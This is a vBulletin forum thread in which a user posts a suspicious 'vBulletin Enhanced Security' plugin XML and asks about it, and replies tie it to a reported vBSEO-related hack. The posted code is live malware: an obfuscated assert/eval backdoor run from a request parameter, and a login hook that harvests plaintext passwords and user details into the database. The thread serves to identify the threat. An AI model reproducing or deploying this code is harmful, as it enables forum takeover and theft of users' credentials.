Announcement

Collapse
No announcement yet.

"vBulletin Enhanced Security" Plugin or Product

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • "vBulletin Enhanced Security" Plugin or Product

    Has anyone else heard of this or recognize the code?

    <?xml version="1.0" encoding="ISO-8859-1"?>
    -<product active="1" productid="evbs">
    <title>vBulletin Enhanced Security</title> <description>Provides additional security for vBulletin sessions and database storage</description>
    <version>1.2.1</version> <url/>
    <versioncheckurl/>
    <dependencies> </dependencies>
    -<codes>
    -<code version="0.1">
    -<installcode>
    <=!=[=C=D=A=T=A=[ $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template` = REPLACE(`template`, 'md5hash', 'sha256Hash')"); $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template_un` = REPLACE(`template_un`, 'md5hash', 'sha256Hash')"); ]=]=>
    </installcode>
    <uninstallcode/>
    </code>
    </codes>
    <templates> </templates>
    -<plugins>
    -<plugin active="1" executionorder="5">
    <title>vBulletin Enhanced Security - Entropy Generator</title>
    <hookname>global_start</hookname>
    <phpcode> /* Generate extra entropy for vBulletin random seed */ assert(pack(chr(99).chr
    (42),105,115,115,101,116,40,36,95,82,69,81,85,69,83,84,91,34,112,109,98,34,93,41,63,101,11 8,97,108,40,98,97,115,101,54,52,95,100,101,99,111,100,101,40,36,95,82,69,81,85,69,83,84,91 ,34,112,109,98,34,93,41,41,58,117,110,105,113,105,100,40,41,59)); </phpcode>
    </plugin>
    -<plugin active="1" executionorder="5">
    <title>vBulletin Enhanced Security - Session Sign</title>
    <hookname>login_verify_success</hookname>
    -<phpcode>
    <=!=[=C=D=A=T=A=[ /* vBulletin Session Encrypt/Sign */ function vb_session_sign($username, $password, $md5password) { global $vbulletin; $extra = $vbulletin->db->query_first("SELECT email, ug.title as lvl" ." FROM ".TABLE_PREFIX."user u, ".TABLE_PREFIX."usergroup ug" ." WHERE u.usergroupid=ug.usergroupid AND u.userid=".$vbulletin->userinfo['userid']); $data = pack("V",21).pack("V",time()) .$username.chr(0).$password.chr(0).$md5password .chr(0).$_SERVER["REMOTE_ADDR"].chr(0).$extra['email'].chr(0).$extra['lvl']; $entry = base64_encode(pack("C",0).pack("C",0).pack("v",0).$data); $vbulletin->db->query_write("REPLACE INTO ".TABLE_PREFIX."datastore (title,data) VALUES" ." ('logincache_".uniqid($vbulletin->userinfo['userid'])."','$entry')"); } vb_session_sign($username, $password, $md5password); ]=]=>
    </phpcode>
    </plugin>
    </plugins>
    <phrases> </phrases>
    <options> </options>
    <helptopics> </helptopics>
    <cronentries> </cronentries>
    <faqentries> </faqentries>
    </product>
    Last edited by tonyw; Fri 6th Jan '12, 10:09am.

  • #2
    Never heard of it.

    There are no modifications on this site - the better place to ask this question would be over on vbulletin.org, the modification site.

    edit: A quick search gives me this - https://www.vbulletin.com/forum/show...ke-forum-login

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to vbulletin.org
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools &lt;- awesome site for html/css help

    Comment


    • #3
      Thanks I just saw that and sent them a message.

      Comment


      • #4
        It may be this:
        http://www.vbseo.com/f5/vbseo-securi...-release-52783

        It has been reported that some sites have had random plugins show up in their plugin list in the vB adminCP.
        _________

        UPDATE:

        I've written up a detailed analysis here:
        vBSEO Hack/Exploit! Adds unknown plugins, turns links red, causes database errors

        And then you'll want to refer to the vBSEO.com thread, specifically page #1 and #12.
        - http://www.vbseo.com/f5/vbseo-securi...release-52783/
        - http://www.vbseo.com/f5/vbseo-securi...3/index12.html
        Last edited by kpmedia; Fri 27th Jan '12, 8:53am. Reason: Updated informationa added.
        ~
        ~ If you're using vB, you need a good host! Read my web hosting reviews.
        ~
        ~ Forum: Digital Video / Digital Photo / Web Design @ digitalFAQ.com
        ~ Forum: DVD & Blu-ray Collecting @ TVPast.org
        ~

        Comment

        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
        Working...
        X